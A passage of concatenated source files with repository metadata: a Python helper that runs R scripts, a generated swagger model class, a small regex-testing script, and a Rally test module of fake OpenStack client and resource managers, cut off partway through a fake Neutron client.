"line_count": 34,
"max_line_length": 95,
"avg_line_length": 32.23529411764706,
"alnum_prop": 0.6386861313868614,
"repo_name": "igsr/igsr_analysis",
"id": "e3bf64e0d3481b066488cc321b68c394521d41f1",
"size": "1096",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "PyHive/Attribute/StoreAttribute.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "3784"
},
{
"name": "Jupyter Notebook",
"bytes": "1784167"
},
{
"name": "Nextflow",
"bytes": "116144"
},
{
"name": "Perl",
"bytes": "280174"
},
{
"name": "Python",
"bytes": "532139"
},
{
"name": "R",
"bytes": "882"
}
],
"symlink_target": ""
} |
import sys
import os
import inspect
import subprocess
import time
import tempfile
import getpass
import shutil
from klab.fs.fsio import read_file, write_temp_file
class RInterface(object):
@staticmethod
def _runRScript(r_script_filename, cwd = '.', remove_output = True):
# Reset to new current working directory
tmp_dir = False
if cwd == None:
tmp_dir = True
cwd = tempfile.mkdtemp( prefix = '%s-%s-%s_' % (time.strftime("%y%m%d"), getpass.getuser(), 'plot-working-dir') )
rscriptname = write_temp_file(cwd, r_script_filename)
p = subprocess.Popen(["R", "CMD", "BATCH", rscriptname], cwd = cwd)
while True:
time.sleep(0.3)
errcode = p.poll()
if errcode != None:
break
rout = "%s.Rout" % rscriptname
os.remove(rscriptname)
rout_contents = None
if os.path.exists(rout):
rout_contents = read_file(rout)
os.remove(rout)
if errcode != 0:
            print(rout_contents)
raise Exception("The R script failed with error code %d." % errcode)
if tmp_dir and remove_output:
shutil.rmtree(cwd)
return rout_contents
@staticmethod
def correlation_coefficient_gplot(inputfname, output_filename, filetype, experiment_field = "Experimental", title = ''):
'''File suffix: pearsons_r_gplot
Description: Pearson's r
Filename: ggplot_pearsons.R
Priority: 1
'''
script_path = os.path.abspath(os.path.dirname(inspect.getsourcefile(sys.modules[__name__])))
r_script_filename = read_file(os.path.join(script_path, "ggplot_pearsons.R")) % vars()
return RInterface._runRScript(r_script_filename)
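# Illustrative call (hedged): the input CSV and output filename below are
# hypothetical, and ggplot_pearsons.R must live next to this module as assumed
# by the method above.
#   RInterface.correlation_coefficient_gplot(
#       "scores.csv", "pearsons.png", "png",
#       experiment_field="Experimental", title="Predicted vs. experimental")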
def run_r_script(r_script_filename, cwd = '.'):
'''This function was adapted from the covariation benchmark.'''
p = subprocess.Popen(["R", "CMD", "BATCH", r_script_filename], cwd = cwd)
while True:
time.sleep(0.3)
errcode = p.poll()
if errcode != None:
break
rout = "{0}out".format(r_script_filename)
rout_contents = None
if os.path.exists(rout):
rout_contents = read_file(rout)
os.remove(rout)
rdata_file = os.path.join(os.path.split(r_script_filename)[0], '.RData')
if os.path.exists(rdata_file):
os.remove(rdata_file)
if errcode != 0:
print(rout_contents)
raise Exception("The R script failed with error code %d." % errcode)
return rout_contents | {
"content_hash": "5706ca2024d8bb472e501144f1a6b73c",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 125,
"avg_line_length": 32.93589743589744,
"alnum_prop": 0.6006228104320748,
"repo_name": "Kortemme-Lab/klab",
"id": "ec4aefba42d79d0fbc03fcd2a53184a5453957d1",
"size": "2569",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "klab/plot/rtools.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Perl",
"bytes": "62782"
},
{
"name": "Python",
"bytes": "2074156"
},
{
"name": "R",
"bytes": "4487"
},
{
"name": "Shell",
"bytes": "4382"
},
{
"name": "TeX",
"bytes": "2107"
}
],
"symlink_target": ""
} |
from verta._swagger.base_type import BaseType
class UacIsSelfAllowedResponse(BaseType):
def __init__(self, allowed=None):
required = {
"allowed": False,
}
self.allowed = allowed
for k, v in required.items():
if self[k] is None and v:
raise ValueError('attribute {} is required'.format(k))
@staticmethod
def from_json(d):
tmp = d.get('allowed', None)
if tmp is not None:
d['allowed'] = tmp
return UacIsSelfAllowedResponse(**d)
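# Illustrative round-trip (hedged example values):
#   UacIsSelfAllowedResponse.from_json({"allowed": True}).allowed  # -> True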
| {
"content_hash": "59b7245ee2f547e70ef5dc694f66761d",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 62,
"avg_line_length": 22.545454545454547,
"alnum_prop": 0.6270161290322581,
"repo_name": "mitdbg/modeldb",
"id": "04d527c6a949c635f5f6b61fd54cbabba00b8319",
"size": "539",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "client/verta/verta/_swagger/_public/uac/model/UacIsSelfAllowedResponse.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "43352"
},
{
"name": "Dockerfile",
"bytes": "235"
},
{
"name": "HTML",
"bytes": "30924"
},
{
"name": "Java",
"bytes": "393927"
},
{
"name": "JavaScript",
"bytes": "1017682"
},
{
"name": "Python",
"bytes": "178774"
},
{
"name": "Scala",
"bytes": "251259"
},
{
"name": "Shell",
"bytes": "16870"
},
{
"name": "Thrift",
"bytes": "55683"
}
],
"symlink_target": ""
} |
'''
Created on Oct 19, 2012
Script to test regex against a file containing values
to match.
@author [email protected]
'''
import re
fileImport = open('example.txt')
strFile = ''
for line in fileImport:
    strFile += line
fileImport.close()
print(strFile)
regexValue = re.compile('Regex Here')
regexSearch = re.search(regexValue, strFile)
if regexSearch:
    print('String Found ' + regexSearch.group())
else:
    print('Nothing Found')
if __name__ == '__main__':
    pass | {
"content_hash": "d08b3dab7f496444ad3a1ff3b73340a7",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 54,
"avg_line_length": 14.303030303030303,
"alnum_prop": 0.6822033898305084,
"repo_name": "kryan762/TekDefense",
"id": "e797287e1dcff8313738138f1aba0a65d62606fb",
"size": "472",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "regexTester.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
} |
import multiprocessing
import random
import re
import string
import uuid
from ceilometerclient import exc as ceilometer_exc
from glanceclient import exc
import mock
from neutronclient.common import exceptions as neutron_exceptions
from novaclient import exceptions as nova_exceptions
import six
from swiftclient import exceptions as swift_exceptions
from rally.common import objects
from rally.common import utils as rally_utils
from rally import consts
from rally.task import context
from rally.task import scenario
def generate_uuid():
return str(uuid.uuid4())
def generate_name(prefix="", length=12, choices=string.ascii_lowercase):
"""Generate pseudo-random name.
:param prefix: str, custom prefix for genertated name
:param length: int, length of autogenerated part of result name
:param choices: str, chars that accurs in generated name
:returns: str, pseudo-random name
"""
return prefix + "".join(random.choice(choices) for i in range(length))
def generate_mac():
"""Generate pseudo-random MAC address.
:returns: str, MAC address
"""
rand_str = generate_name(choices="0123456789abcdef", length=12)
return ":".join(re.findall("..", rand_str))
def setup_dict(data, required=None, defaults=None):
"""Setup and validate dict scenario_base. on mandatory keys and default data.
This function reduces code that constructs dict objects
with specific schema (e.g. for API data).
:param data: dict, input data
:param required: list, mandatory keys to check
:param defaults: dict, default data
:returns: dict, with all keys set
:raises IndexError, ValueError: If input data is incorrect
"""
required = required or []
for i in set(required) - set(data):
raise IndexError("Missed: %s" % i)
defaults = defaults or {}
for i in set(data) - set(required) - set(defaults):
raise ValueError("Unexpected: %s" % i)
defaults.update(data)
return defaults
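# Examples of the behaviour documented above (illustrative values):
#   setup_dict({"name": "net-1"}, required=["name"],
#              defaults={"admin_state_up": True})
#   # -> {"name": "net-1", "admin_state_up": True}
#   setup_dict({}, required=["name"])  # raises IndexError("Missed: name")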
class FakeResource(object):
def __init__(self, manager=None, name=None, status="ACTIVE", items=None,
deployment_uuid=None, id=None):
self.name = name or generate_uuid()
self.status = status
self.manager = manager
self.uuid = generate_uuid()
self.id = id or self.uuid
self.items = items or {}
self.deployment_uuid = deployment_uuid or generate_uuid()
def __getattr__(self, name):
# NOTE(msdubov): e.g. server.delete() -> manager.delete(server)
def manager_func(*args, **kwargs):
return getattr(self.manager, name)(self, *args, **kwargs)
return manager_func
def __getitem__(self, key):
return self.items[key]
class FakeServer(FakeResource):
def suspend(self):
self.status = "SUSPENDED"
def lock(self):
setattr(self, "OS-EXT-STS:locked", True)
def unlock(self):
setattr(self, "OS-EXT-STS:locked", False)
class FakeImage(FakeResource):
def __init__(self, manager=None, id="image-id-0", min_ram=0,
size=0, min_disk=0, status="active", name=None):
super(FakeImage, self).__init__(manager, id=id, name=name)
self.min_ram = min_ram
self.size = size
self.min_disk = min_disk
self.status = status
self.update = mock.MagicMock()
class FakeStrategy(FakeResource):
pass
class FakeGoal(FakeResource):
pass
class FakeMurano(FakeResource):
pass
class FakeFloatingIP(FakeResource):
pass
class FakeFloatingIPPool(FakeResource):
pass
class FakeTenant(FakeResource):
def __init__(self, manager, name):
super(FakeTenant, self).__init__(manager, name=name)
class FakeUser(FakeResource):
pass
class FakeService(FakeResource):
pass
class FakeNetwork(FakeResource):
pass
class FakeFlavor(FakeResource):
def __init__(self, id="flavor-id-0", manager=None, ram=0, disk=0, vcpus=1,
name="flavor-name-0"):
super(FakeFlavor, self).__init__(manager, id=id)
self.ram = ram
self.disk = disk
self.vcpus = vcpus
self.name = name
class FakeKeypair(FakeResource):
pass
class FakeStack(FakeResource):
pass
class FakeDomain(FakeResource):
pass
class FakeQuotas(FakeResource):
pass
class FakeSecurityGroup(FakeResource):
def __init__(self, manager=None, rule_manager=None, id=None, name=None):
super(FakeSecurityGroup, self).__init__(manager, id=id, name=name)
self.rule_manager = rule_manager
@property
def rules(self):
return [rule for rule in self.rule_manager.list()
if rule.parent_group_id == self.id]
class FakeSecurityGroupRule(FakeResource):
def __init__(self, name, **kwargs):
super(FakeSecurityGroupRule, self).__init__(name)
if "cidr" in kwargs:
kwargs["ip_range"] = {"cidr": kwargs["cidr"]}
del kwargs["cidr"]
for key, value in kwargs.items():
self.items[key] = value
setattr(self, key, value)
class FakeMetric(FakeResource):
    def __init__(self, manager=None, **kwargs):
super(FakeMetric, self).__init__(manager)
self.metric = kwargs.get("metric_name")
self.optional_args = kwargs.get("optional_args", {})
class FakeAlarm(FakeResource):
def __init__(self, manager=None, **kwargs):
super(FakeAlarm, self).__init__(manager)
self.meter_name = kwargs.get("meter_name")
self.threshold = kwargs.get("threshold")
self.state = kwargs.get("state", "fake-alarm-state")
self.alarm_id = kwargs.get("alarm_id", "fake-alarm-id")
self.state = kwargs.get("state", "ok")
self.optional_args = kwargs.get("optional_args", {})
class FakeSample(FakeResource):
def __init__(self, manager=None, **kwargs):
super(FakeSample, self).__init__(manager)
self.counter_name = kwargs.get("counter_name", "fake-counter-name")
self.counter_type = kwargs.get("counter_type", "fake-counter-type")
self.counter_unit = kwargs.get("counter_unit", "fake-counter-unit")
self.counter_volume = kwargs.get("counter_volume", 100)
@property
def resource_id(self):
return "fake-resource-id"
def to_dict(self):
return {"counter_name": self.counter_name,
"counter_type": self.counter_type,
"counter_unit": self.counter_unit,
"counter_volume": self.counter_volume,
"resource_id": self.resource_id}
class FakeVolume(FakeResource):
@property
def _info(self):
return {"id": "uuid"}
class FakeVolumeType(FakeResource):
pass
class FakeVolumeTransfer(FakeResource):
pass
class FakeVolumeSnapshot(FakeResource):
pass
class FakeVolumeBackup(FakeResource):
pass
class FakeRole(FakeResource):
pass
class FakeQueue(FakeResource):
def __init__(self, manager=None, name="myqueue"):
super(FakeQueue, self).__init__(manager, name)
self.queue_name = name
self.messages = FakeMessagesManager(name)
def post(self, messages):
for msg in messages:
self.messages.create(**msg)
def messages(self):
return self.messages.list()
class FakeDbInstance(FakeResource):
pass
class FakeMessage(FakeResource):
def __init__(self, manager=None, **kwargs):
super(FakeMessage, self).__init__(manager)
self.body = kwargs.get("body", "fake-body")
self.ttl = kwargs.get("ttl", 100)
class FakeAvailabilityZone(FakeResource):
def __init__(self, manager=None):
super(FakeAvailabilityZone, self).__init__(manager)
self.zoneName = mock.MagicMock()
self.zoneState = mock.MagicMock()
self.hosts = mock.MagicMock()
class FakeWorkbook(FakeResource):
def __init__(self, manager=None):
super(FakeWorkbook, self).__init__(manager)
self.workbook = mock.MagicMock()
class FakeObject(FakeResource):
pass
class FakeBaymodel(FakeResource):
pass
class FakeManager(object):
def __init__(self):
super(FakeManager, self).__init__()
self.cache = {}
self.resources_order = []
def get(self, resource_uuid):
return self.cache.get(resource_uuid)
def delete(self, resource_uuid):
cached = self.get(resource_uuid)
if cached is not None:
cached.status = "DELETED"
del self.cache[resource_uuid]
self.resources_order.remove(resource_uuid)
def _cache(self, resource):
self.resources_order.append(resource.uuid)
self.cache[resource.uuid] = resource
return resource
def list(self, **kwargs):
return [self.cache[key] for key in self.resources_order]
def find(self, **kwargs):
for resource in self.cache.values():
match = True
for key, value in kwargs.items():
if getattr(resource, key, None) != value:
match = False
break
if match:
return resource
class FakeServerManager(FakeManager):
def __init__(self, image_mgr=None):
super(FakeServerManager, self).__init__()
self.images = image_mgr or FakeImageManager()
def get(self, resource_uuid):
server = self.cache.get(resource_uuid)
if server is not None:
return server
raise nova_exceptions.NotFound("Server %s not found" % (resource_uuid))
def _create(self, server_class=FakeServer, name=None):
server = self._cache(server_class(self))
if name is not None:
server.name = name
return server
def create(self, name, image_id, flavor_id, **kwargs):
return self._create(name=name)
def create_image(self, server, name):
image = self.images._create()
return image.uuid
def add_floating_ip(self, server, fip):
pass
def remove_floating_ip(self, server, fip):
pass
def delete(self, resource):
if not isinstance(resource, six.string_types):
resource = resource.id
cached = self.get(resource)
if cached is not None:
cached.status = "DELETED"
del self.cache[resource]
self.resources_order.remove(resource)
class FakeImageManager(FakeManager):
def __init__(self):
super(FakeImageManager, self).__init__()
def get(self, resource_uuid):
image = self.cache.get(resource_uuid)
if image is not None:
return image
raise exc.HTTPNotFound("Image %s not found" % (resource_uuid))
def _create(self, image_class=FakeImage, name=None, id=None):
image = self._cache(image_class(self))
image.owner = "dummy"
image.id = image.uuid
if name is not None:
image.name = name
return image
def create(self, name, copy_from, container_format, disk_format):
return self._create(name=name)
def delete(self, resource):
if not isinstance(resource, six.string_types):
resource = resource.id
cached = self.get(resource)
if cached is not None:
cached.status = "DELETED"
del self.cache[resource]
self.resources_order.remove(resource)
class FakeStrategyManager(FakeManager):
def get(self, resource_name):
for key in self.resources_order:
if self.cache[key].name == resource_name:
return self.cache[key]
class FakeGoalManager(FakeManager):
def get(self, resource_name):
for key in self.resources_order:
if self.cache[key].name == resource_name:
return self.cache[key]
class FakePackageManager(FakeManager):
def create(self, package_descr, package_arch, package_class=FakeMurano):
package = self._cache(package_class(self))
package.name = list(package_arch.keys())[0]
return package
class FakeFloatingIPsManager(FakeManager):
def create(self):
return FakeFloatingIP(self)
class FakeFloatingIPPoolsManager(FakeManager):
def create(self):
return FakeFloatingIPPool(self)
class FakeTenantsManager(FakeManager):
def create(self, name):
return self._cache(FakeTenant(self, name))
def update(self, tenant_id, name=None, description=None):
tenant = self.get(tenant_id)
name = name or (tenant.name + "_updated")
desc = description or (tenant.name + "_description_updated")
tenant.name = name
tenant.description = desc
return self._cache(tenant)
class FakeNetworkManager(FakeManager):
def create(self, net_id):
net = FakeNetwork(self)
net.id = net_id
return self._cache(net)
class FakeFlavorManager(FakeManager):
def create(self):
flv = FakeFlavor(self)
return self._cache(flv)
class FakeKeypairManager(FakeManager):
def create(self, name, public_key=None):
kp = FakeKeypair(self)
kp.name = name or kp.name
return self._cache(kp)
def delete(self, resource):
if not isinstance(resource, six.string_types):
resource = resource.id
cached = self.get(resource)
if cached is not None:
cached.status = "DELETED"
del self.cache[resource]
self.resources_order.remove(resource)
class FakeBaymodelManager(FakeManager):
def create(self, name):
baymodel = FakeBaymodel(self)
baymodel.name = name or baymodel.name
return self._cache(baymodel)
def delete(self, resource):
if not isinstance(resource, six.string_types):
resource = resource.id
cached = self.get(resource)
if cached is not None:
del self.cache[resource]
self.resources_order.remove(resource)
class FakeStackManager(FakeManager):
def create(self, name):
stack = FakeStack(self)
stack.name = name or stack.name
return self._cache(stack)
def delete(self, resource):
if not isinstance(resource, six.string_types):
resource = resource.id
cached = self.get(resource)
if cached is not None:
cached.status = "DELETE_COMPLETE"
del self.cache[resource]
self.resources_order.remove(resource)
class FakeDomainManager(FakeManager):
def create(self, name):
domain = FakeDomain(self)
domain.name = name or domain.name
return self._cache(domain)
def delete(self, resource):
if not isinstance(resource, six.string_types):
resource = resource.id
cached = self.get(resource)
if cached is not None:
cached.status = "DELETE_COMPLETE"
del self.cache[resource]
self.resources_order.remove(resource)
class FakeNovaQuotasManager(FakeManager):
def update(self, tenant_id, **kwargs):
fq = FakeQuotas(self)
return self._cache(fq)
def delete(self, tenant_id):
pass
class FakeCinderQuotasManager(FakeManager):
def update(self, tenant_id, **kwargs):
fq = FakeQuotas(self)
return self._cache(fq)
def delete(self, tenant_id):
pass
class FakeSecurityGroupManager(FakeManager):
def __init__(self, rule_manager=None):
super(FakeSecurityGroupManager, self).__init__()
self.rule_manager = rule_manager
self.create("default")
def create(self, name, description=""):
sg = FakeSecurityGroup(
manager=self,
rule_manager=self.rule_manager)
sg.name = name or sg.name
sg.description = description
return self._cache(sg)
def to_dict(self, obj):
return {"id": obj.id, "name": obj.name}
def find(self, name, **kwargs):
kwargs["name"] = name
for resource in self.cache.values():
match = True
for key, value in kwargs.items():
if getattr(resource, key, None) != value:
match = False
break
if match:
return resource
raise nova_exceptions.NotFound("Security Group not found")
def delete(self, resource):
if not isinstance(resource, six.string_types):
resource = resource.id
cached = self.get(resource)
if cached is not None:
cached.status = "DELETED"
del self.cache[resource]
self.resources_order.remove(resource)
class FakeSecurityGroupRuleManager(FakeManager):
def __init__(self):
super(FakeSecurityGroupRuleManager, self).__init__()
def create(self, parent_group_id, **kwargs):
kwargs["parent_group_id"] = parent_group_id
sgr = FakeSecurityGroupRule(self, **kwargs)
return self._cache(sgr)
class FakeUsersManager(FakeManager):
def create(self, username, password, email, tenant_id):
user = FakeUser(manager=self, name=username)
user.name = username or user.name
return self._cache(user)
class FakeServicesManager(FakeManager):
def list(self):
return []
class FakeVolumeManager(FakeManager):
def __init__(self):
super(FakeVolumeManager, self).__init__()
self.__volumes = {}
self.__tenant_id = generate_uuid()
def create(self, size=None, **kwargs):
volume = FakeVolume(self)
volume.size = size or 1
volume.name = kwargs.get("display_name", volume.name)
volume.status = "available"
volume.tenant_id = self.__tenant_id
self.__volumes[volume.id] = volume
return self._cache(volume)
def list(self):
return self.__volumes.values()
def delete(self, resource):
super(FakeVolumeManager, self).delete(resource.id)
del self.__volumes[resource.id]
class FakeVolumeTypeManager(FakeManager):
def create(self, name):
vol_type = FakeVolumeType(self)
vol_type.name = name or vol_type.name
return self._cache(vol_type)
class FakeVolumeTransferManager(FakeManager):
def __init__(self):
super(FakeVolumeTransferManager, self).__init__()
self.__volume_transfers = {}
def list(self):
return self.__volume_transfers.values()
def create(self, name):
transfer = FakeVolumeTransfer(self)
transfer.name = name or transfer.name
self.__volume_transfers[transfer.id] = transfer
return self._cache(transfer)
def delete(self, resource):
super(FakeVolumeTransferManager, self).delete(resource.id)
del self.__volume_transfers[resource.id]
class FakeVolumeSnapshotManager(FakeManager):
def __init__(self):
super(FakeVolumeSnapshotManager, self).__init__()
self.__snapshots = {}
self.__tenant_id = generate_uuid()
def create(self, name, force=False, display_name=None):
snapshot = FakeVolumeSnapshot(self)
snapshot.name = name or snapshot.name
snapshot.status = "available"
snapshot.tenant_id = self.__tenant_id
self.__snapshots[snapshot.id] = snapshot
return self._cache(snapshot)
def list(self):
return self.__snapshots.values()
def delete(self, resource):
super(FakeVolumeSnapshotManager, self).delete(resource.id)
del self.__snapshots[resource.id]
class FakeVolumeBackupManager(FakeManager):
def __init__(self):
super(FakeVolumeBackupManager, self).__init__()
self.__backups = {}
self.__tenant_id = generate_uuid()
def create(self, name):
backup = FakeVolumeBackup(self)
backup.name = name or backup.name
self.__backups[backup.id] = backup
return self._cache(backup)
def list(self):
return self.__backups.values()
def delete(self, resource):
super(FakeVolumeBackupManager, self).delete(resource.id)
del self.__backups[resource.id]
class FakeRolesManager(FakeManager):
def create(self, role_id, name):
role = FakeRole(self)
role.name = name
role.id = role_id
return self._cache(role)
def roles_for_user(self, user, tenant):
role = FakeRole(self)
role.name = "admin"
return [role, ]
def add_user_role(self, user, role, tenant):
pass
class FakeMetricManager(FakeManager):
def create(self, **kwargs):
metric = FakeMetric(self, **kwargs)
return self._cache(metric)
def get(self, metric_id):
metric = self.find(metric_id=metric_id)
return [metric]
class FakeAlarmManager(FakeManager):
def get(self, alarm_id):
alarm = self.find(alarm_id=alarm_id)
if alarm:
return [alarm]
raise ceilometer_exc.HTTPNotFound(
"Alarm with %s not found" % (alarm_id))
def update(self, alarm_id, **fake_alarm_dict_diff):
alarm = self.get(alarm_id)[0]
for attr, value in six.iteritems(fake_alarm_dict_diff):
setattr(alarm, attr, value)
return alarm
def create(self, **kwargs):
alarm = FakeAlarm(self, **kwargs)
return self._cache(alarm)
def delete(self, alarm_id):
alarm = self.find(alarm_id=alarm_id)
if alarm is not None:
alarm.status = "DELETED"
del self.cache[alarm.id]
self.resources_order.remove(alarm.id)
def get_state(self, alarm_id):
alarm = self.find(alarm_id=alarm_id)
if alarm is not None:
return getattr(alarm, "state", "fake-alarm-state")
def get_history(self, alarm_id):
return ["fake-alarm-history"]
def set_state(self, alarm_id, state):
alarm = self.find(alarm_id=alarm_id)
if alarm is not None:
return setattr(alarm, "state", state)
class FakeSampleManager(FakeManager):
def create(self, **kwargs):
sample = FakeSample(self, **kwargs)
return [self._cache(sample)]
def list(self):
return ["fake-samples"]
class FakeMeterManager(FakeManager):
def list(self):
return ["fake-meter"]
class FakeMetricsManager(FakeManager):
def list(self):
return ["fake-metric"]
class FakeCeilometerResourceManager(FakeManager):
def get(self, resource_id):
return ["fake-resource-info"]
def list(self):
return ["fake-resource"]
class FakeStatisticsManager(FakeManager):
def list(self, meter):
return ["%s-statistics" % meter]
class FakeQueryManager(FakeManager):
def query(self, filter, orderby, limit):
return ["fake-query-result"]
class FakeQueuesManager(FakeManager):
def __init__(self):
super(FakeQueuesManager, self).__init__()
self.__queues = {}
def create(self, name):
queue = FakeQueue(self, name)
self.__queues[queue.name] = queue
return self._cache(queue)
def list(self):
return self.__queues.values()
def delete(self, queue):
super(FakeQueuesManager, self).delete(queue.name)
del self.__queues[queue.name]
class FakeDbInstanceManager(FakeManager):
def __init__(self):
super(FakeDbInstanceManager, self).__init__()
self.__db_instances = {}
    def create(self, name, flavor_id, size):
        instance = FakeDbInstance(self)
        instance.name = name or instance.name
        instance.flavor_id = flavor_id
        instance.size = size
        self.__db_instances[instance.id] = instance
        return self._cache(instance)
def list(self):
return self.__db_instances.values()
def delete(self, resource):
if not isinstance(resource, six.string_types):
resource = resource.id
cached = self.get(resource)
if cached is not None:
cached.status = "DELETE_COMPLETE"
del self.cache[resource]
self.resources_order.remove(resource)
class FakeMessagesManager(FakeManager):
def __init__(self, queue="myqueue"):
super(FakeMessagesManager, self).__init__()
self.__queue = queue
self.__messages = {}
def create(self, **kwargs):
message = FakeMessage(self, **kwargs)
self.__messages[message.id] = message
return self._cache(message)
def list(self):
return self.__messages.values()
def delete(self, message):
super(FakeMessagesManager, self).delete(message.id)
del self.__messages[message.id]
class FakeAvailabilityZonesManager(FakeManager):
def __init__(self):
super(FakeAvailabilityZonesManager, self).__init__()
self.zones = FakeAvailabilityZone()
def list(self):
return [self.zones]
class FakeWorkbookManager(FakeManager):
def __init__(self):
super(FakeWorkbookManager, self).__init__()
self.workbook = FakeWorkbook()
def list(self):
return [self.workbook]
class FakeObjectManager(FakeManager):
def get_account(self, **kwargs):
containers = self.list()
return (mock.MagicMock(), [{"name": con.name} for con in containers])
def get_container(self, name, **kwargs):
container = self.find(name=name)
if container is None:
raise swift_exceptions.ClientException("Container GET failed")
return (mock.MagicMock(), [{"name": obj} for obj in container.items])
def put_container(self, name, **kwargs):
if self.find(name=name):
raise swift_exceptions.ClientException("Container PUT failed")
self._cache(FakeObject(name=name))
def delete_container(self, name, **kwargs):
container = self.find(name=name)
if container is None or len(container.items.keys()) > 0:
raise swift_exceptions.ClientException("Container DELETE failed")
self.delete(container.uuid)
def get_object(self, container_name, object_name, **kwargs):
container = self.find(name=container_name)
if container is None or object_name not in container.items:
raise swift_exceptions.ClientException("Object GET failed")
return (mock.MagicMock(), container.items[object_name])
def put_object(self, container_name, object_name, content, **kwargs):
container = self.find(name=container_name)
if container is None:
raise swift_exceptions.ClientException("Object PUT failed")
container.items[object_name] = content
return mock.MagicMock()
def delete_object(self, container_name, object_name, **kwargs):
container = self.find(name=container_name)
if container is None or object_name not in container.items:
raise swift_exceptions.ClientException("Object DELETE failed")
del container.items[object_name]
class FakeServiceCatalog(object):
def get_credentials(self):
return {"image": [{"publicURL": "http://fake.to"}],
"metering": [{"publicURL": "http://fake.to"}],
"monitoring": [{"publicURL": "http://fake.to"}]}
def url_for(self, **kwargs):
return "http://fake.to"
class FakeGlanceClient(object):
def __init__(self):
self.images = FakeImageManager()
class FakeMuranoClient(object):
def __init__(self):
self.packages = FakePackageManager()
class FakeCinderClient(object):
def __init__(self):
self.volumes = FakeVolumeManager()
self.volume_types = FakeVolumeTypeManager()
self.transfers = FakeVolumeTransferManager()
self.volume_snapshots = FakeVolumeSnapshotManager()
self.backups = FakeVolumeBackupManager()
self.quotas = FakeCinderQuotasManager()
class FakeNovaClient(object):
def __init__(self, failed_server_manager=False):
self.images = FakeImageManager()
self.servers = FakeServerManager(self.images)
self.floating_ips = FakeFloatingIPsManager()
self.floating_ip_pools = FakeFloatingIPPoolsManager()
self.networks = FakeNetworkManager()
self.flavors = FakeFlavorManager()
self.keypairs = FakeKeypairManager()
self.security_group_rules = FakeSecurityGroupRuleManager()
self.security_groups = FakeSecurityGroupManager(
rule_manager=self.security_group_rules)
self.quotas = FakeNovaQuotasManager()
self.set_management_url = mock.MagicMock()
self.availability_zones = FakeAvailabilityZonesManager()
class FakeHeatClient(object):
def __init__(self):
self.stacks = FakeStackManager()
class FakeDesignateClient(object):
def __init__(self):
self.domains = FakeDomainManager()
class FakeKeystoneClient(object):
def __init__(self):
self.tenants = FakeTenantsManager()
self.users = FakeUsersManager()
self.roles = FakeRolesManager()
self.project_id = "abc123"
self.auth_url = "http://example.com:5000/v2.0/"
self.auth_token = "fake"
self.auth_user_id = generate_uuid()
self.auth_tenant_id = generate_uuid()
self.service_catalog = FakeServiceCatalog()
self.services = FakeServicesManager()
self.region_name = "RegionOne"
self.auth_ref = mock.Mock()
self.auth_ref.role_names = ["admin"]
self.version = "v2.0"
self.session = mock.MagicMock()
self.authenticate = mock.MagicMock()
def authenticate(self):
return True
def list_users(self):
return self.users.list()
def list_projects(self):
return self.tenants.list()
def list_services(self):
return self.services.list()
def list_roles(self):
return self.roles.list()
def delete_user(self, uuid):
return self.users.delete(uuid)
class FakeCeilometerClient(object):
def __init__(self):
self.alarms = FakeAlarmManager()
self.meters = FakeMeterManager()
self.resources = FakeCeilometerResourceManager()
self.statistics = FakeStatisticsManager()
self.samples = FakeSampleManager()
self.query_alarms = FakeQueryManager()
self.query_samples = FakeQueryManager()
self.query_alarm_history = FakeQueryManager()
class FakeGnocchiClient(object):
def __init__(self):
self.metric = FakeMetricManager()
class FakeMonascaClient(object):
def __init__(self):
self.metrics = FakeMetricsManager()
class FakeNeutronClient(object):
def __init__(self, **kwargs):
self.__networks = {}
self.__subnets = {}
self.__routers = {}
self.__ports = {}
self.__pools = {}
self.__vips = {}
self.__fips = {}
self.__healthmonitors = {}
self.__tenant_id = kwargs.get("tenant_id", generate_uuid())
self.format = "json"
self.version = "2.0"
@staticmethod
def _filter(resource_list, search_opts):
return [res for res in resource_list
if all(res[field] == value
for field, value in search_opts.items())]
def add_interface_router(self, router_id, data):
subnet_id = data["subnet_id"]
if (router_id not in self.__routers or
subnet_id not in self.__subnets):
raise neutron_exceptions.NeutronClientException
subnet = self.__subnets[subnet_id]
port = self.create_port(
{"port": {"network_id": subnet["network_id"]}})["port"]
port["device_id"] = router_id
port["fixed_ips"].append({"subnet_id": subnet_id,
"ip_address": subnet["gateway_ip"]})
return {"subnet_id": subnet_id,
"tenant_id": port["tenant_id"],
"port_id": port["id"],
"id": router_id}
def create_network(self, data):
network = setup_dict(data["network"],
defaults={"name": generate_name("net_"),
"admin_state_up": True})
network_id = generate_uuid()
network.update({"id": network_id,
"status": "ACTIVE",
"subnets": [],
"provider:physical_network": None,
"tenant_id": self.__tenant_id,
"provider:network_type": "local",
"router:external": True,
"shared": False,
"provider:segmentation_id": None})
self.__networks[network_id] = network
return {"network": network}
def create_pool(self, data):
pool = setup_dict(data["pool"],
required=["lb_method", "protocol", "subnet_id"],
defaults={"name": generate_name("pool_"),
"admin_state_up": True})
if pool["subnet_id"] not in self.__subnets:
raise neutron_exceptions.NeutronClientException
pool_id = generate_uuid()
pool.update({"id": pool_id,
"status": "PENDING_CREATE",
"tenant_id": self.__tenant_id})
self.__pools[pool_id] = pool
return {"pool": pool}
def create_vip(self, data):
vip = setup_dict(data["vip"],
required=["protocol_port", "protocol", "subnet_id",
"pool_id"],
defaults={"name": generate_name("vip_"),
"admin_state_up": True})
if (vip["subnet_id"] not in self.__subnets) or (vip["pool_id"] not in
self.__pools):
raise neutron_exceptions.NeutronClientException
vip_id = generate_uuid()
vip.update({"id": vip_id,
"status": "PENDING_CREATE",
"tenant_id": self.__tenant_id})
self.__vips[vip_id] = vip
return {"vip": vip}
def create_floatingip(self, data):
fip = setup_dict(data["floatingip"],
required=["floating_network"],
defaults={"admin_state_up": True})
if (fip["floating_network"] not in self.__nets):
raise neutron_exceptions.NeutronClientException
fip_id = generate_uuid()
fip.update({"id": fip_id,
"tenant_id": self.__tenant_id})
self.__fips[fip_id] = fip
return {"fip": fip}
def create_health_monitor(self, data):
